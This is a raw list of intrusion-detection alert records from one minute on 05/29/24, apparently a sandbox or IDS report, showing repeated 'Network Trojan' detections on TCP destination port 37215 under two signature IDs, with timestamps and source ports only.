                Timestamp:05/29/24-15:15:30.908033
                SID:2835222
                Source Port:58450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628072
                SID:2835222
                Source Port:40030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728646
                SID:2829579
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821199
                SID:2829579
                Source Port:54318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897315
                SID:2829579
                Source Port:51952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608252
                SID:2835222
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591173
                SID:2835222
                Source Port:57268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264220
                SID:2835222
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385362
                SID:2835222
                Source Port:52708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271697
                SID:2835222
                Source Port:50922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558101
                SID:2835222
                Source Port:39312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287797
                SID:2829579
                Source Port:48192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140902
                SID:2835222
                Source Port:59116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435556
                SID:2835222
                Source Port:33800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561755
                SID:2829579
                Source Port:60622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867686
                SID:2829579
                Source Port:34982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559116
                SID:2829579
                Source Port:33056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175715
                SID:2835222
                Source Port:42284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071808
                SID:2829579
                Source Port:49606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672309
                SID:2829579
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712637
                SID:2829579
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766387
                SID:2829579
                Source Port:60206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672412
                SID:2829579
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782582
                SID:2829579
                Source Port:49540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518976
                SID:2829579
                Source Port:48932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526759
                SID:2829579
                Source Port:37214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211977
                SID:2835222
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266062
                SID:2829579
                Source Port:41126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519032
                SID:2829579
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993610
                SID:2835222
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664427
                SID:2835222
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944737
                SID:2829579
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068276
                SID:2835222
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717324
                SID:2835222
                Source Port:60174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583281
                SID:2835222
                Source Port:44574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169104
                SID:2835222
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517803
                SID:2835222
                Source Port:54110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575041
                SID:2835222
                Source Port:38646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287775
                SID:2835222
                Source Port:32800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814868
                SID:2835222
                Source Port:51504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873268
                SID:2835222
                Source Port:35586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216799
                SID:2835222
                Source Port:46444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660237
                SID:2835222
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797838
                SID:2829579
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175054
                SID:2835222
                Source Port:37538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811017
                SID:2835222
                Source Port:50462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927696
                SID:2829579
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207528
                SID:2829579
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783344
                SID:2829579
                Source Port:34348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511083
                SID:2835222
                Source Port:38656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586302
                SID:2829579
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556670
                SID:2835222
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869565
                SID:2829579
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279305
                SID:2835222
                Source Port:38168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870122
                SID:2829579
                Source Port:36394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039783
                SID:2835222
                Source Port:37756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166152
                SID:2835222
                Source Port:53696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470103
                SID:2829579
                Source Port:48438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716873
                SID:2835222
                Source Port:40714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026486
                SID:2829579
                Source Port:33162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948205
                SID:2835222
                Source Port:52114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724503
                SID:2835222
                Source Port:56956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946835
                SID:2829579
                Source Port:38816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276458
                SID:2829579
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321593
                SID:2835222
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359688
                SID:2829579
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689529
                SID:2835222
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818113
                SID:2835222
                Source Port:40660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881619
                SID:2829579
                Source Port:51024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503539
                SID:2835222
                Source Port:52882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796170
                SID:2829579
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890951
                SID:2835222
                Source Port:48102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161252
                SID:2835222
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319400
                SID:2835222
                Source Port:52678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662167
                SID:2835222
                Source Port:55888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960853
                SID:2835222
                Source Port:57086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209539
                SID:2835222
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558128
                SID:2829579
                Source Port:47708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287112
                SID:2835222
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574364
                SID:2835222
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008962
                SID:2829579
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586026
                SID:2829579
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666865
                SID:2829579
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175102
                SID:2829579
                Source Port:44786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728627
                SID:2829579
                Source Port:37718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815620
                SID:2835222
                Source Port:44738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155201
                SID:2835222
                Source Port:47008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226671
                SID:2835222
                Source Port:36044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555755
                SID:2835222
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994448
                SID:2829579
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613125
                SID:2835222
                Source Port:45644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979213
                SID:2829579
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737048
                SID:2835222
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871707
                SID:2835222
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668062
                SID:2829579
                Source Port:45824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947533
                SID:2835222
                Source Port:50582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048202
                SID:2829579
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630650
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025534
                SID:2829579
                Source Port:36532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586774
                SID:2835222
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896382
                SID:2835222
                Source Port:38952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985718
                SID:2835222
                Source Port:48090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873368
                SID:2829579
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364251
                SID:2829579
                Source Port:58388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448532
                SID:2829579
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387182
                SID:2829579
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715238
                SID:2829579
                Source Port:44382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022942
                SID:2829579
                Source Port:54012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434265
                SID:2835222
                Source Port:57384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798013
                SID:2829579
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522097
                SID:2835222
                Source Port:38838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842391
                SID:2829579
                Source Port:40498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238931
                SID:2829579
                Source Port:36660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681911
                SID:2835222
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624992
                SID:2829579
                Source Port:59578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669372
                SID:2829579
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782343
                SID:2829579
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943028
                SID:2835222
                Source Port:47576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951072
                SID:2829579
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873308
                SID:2829579
                Source Port:50310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435934
                SID:2829579
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869126
                SID:2829579
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639535
                SID:2835222
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744545
                SID:2829579
                Source Port:56444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568423
                SID:2829579
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966612
                SID:2835222
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272330
                SID:2835222
                Source Port:48460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228490
                SID:2835222
                Source Port:40186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743291
                SID:2835222
                Source Port:51442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071257
                SID:2835222
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229975
                SID:2835222
                Source Port:52970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617136
                SID:2835222
                Source Port:49594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.516904
                SID:2835222
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645102
                SID:2835222
                Source Port:43450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421923
                SID:2835222
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019186
                SID:2829579
                Source Port:56554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286674
                SID:2835222
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166086
                SID:2835222
                Source Port:34748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548650
                SID:2835222
                Source Port:33344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713299
                SID:2835222
                Source Port:46506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721826
                SID:2829579
                Source Port:51994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385816
                SID:2835222
                Source Port:43570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397250
                SID:2829579
                Source Port:56972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855788
                SID:2835222
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.026323
                SID:2829579
                Source Port:47092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166901
                SID:2835222
                Source Port:33474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785409
                SID:2829579
                Source Port:39106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659700
                SID:2835222
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787482
                SID:2835222
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275898
                SID:2835222
                Source Port:42074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716330
                SID:2835222
                Source Port:54292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910963
                SID:2829579
                Source Port:33068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013563
                SID:2829579
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102999
                SID:2829579
                Source Port:33782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207577
                SID:2829579
                Source Port:33230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688913
                SID:2829579
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763340
                SID:2835222
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771114
                SID:2829579
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881246
                SID:2829579
                Source Port:49848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857245
                SID:2835222
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288492
                SID:2835222
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173182
                SID:2835222
                Source Port:49464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420214
                SID:2829579
                Source Port:41240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628963
                SID:2835222
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653496
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958237
                SID:2835222
                Source Port:60604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575789
                SID:2829579
                Source Port:59526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948386
                SID:2835222
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034060
                SID:2835222
                Source Port:43348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520508
                SID:2829579
                Source Port:41378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279162
                SID:2835222
                Source Port:60748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559038
                SID:2835222
                Source Port:53268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715375
                SID:2835222
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226018
                SID:2829579
                Source Port:48202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007595
                SID:2829579
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042728
                SID:2829579
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598232
                SID:2835222
                Source Port:36824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842182
                SID:2835222
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812186
                SID:2835222
                Source Port:51942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028021
                SID:2835222
                Source Port:43318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321401
                SID:2835222
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263082
                SID:2829579
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982279
                SID:2829579
                Source Port:35080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988867
                SID:2835222
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899309
                SID:2829579
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655157
                SID:2829579
                Source Port:46594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538129
                SID:2835222
                Source Port:51628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855031
                SID:2835222
                Source Port:34318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663680
                SID:2829579
                Source Port:42868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897399
                SID:2835222
                Source Port:57786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833033
                SID:2835222
                Source Port:36966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835893
                SID:2835222
                Source Port:51376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035487
                SID:2835222
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715418
                SID:2829579
                Source Port:37658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859750
                SID:2829579
                Source Port:58486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714004
                SID:2835222
                Source Port:47216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320126
                SID:2835222
                Source Port:58406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819174
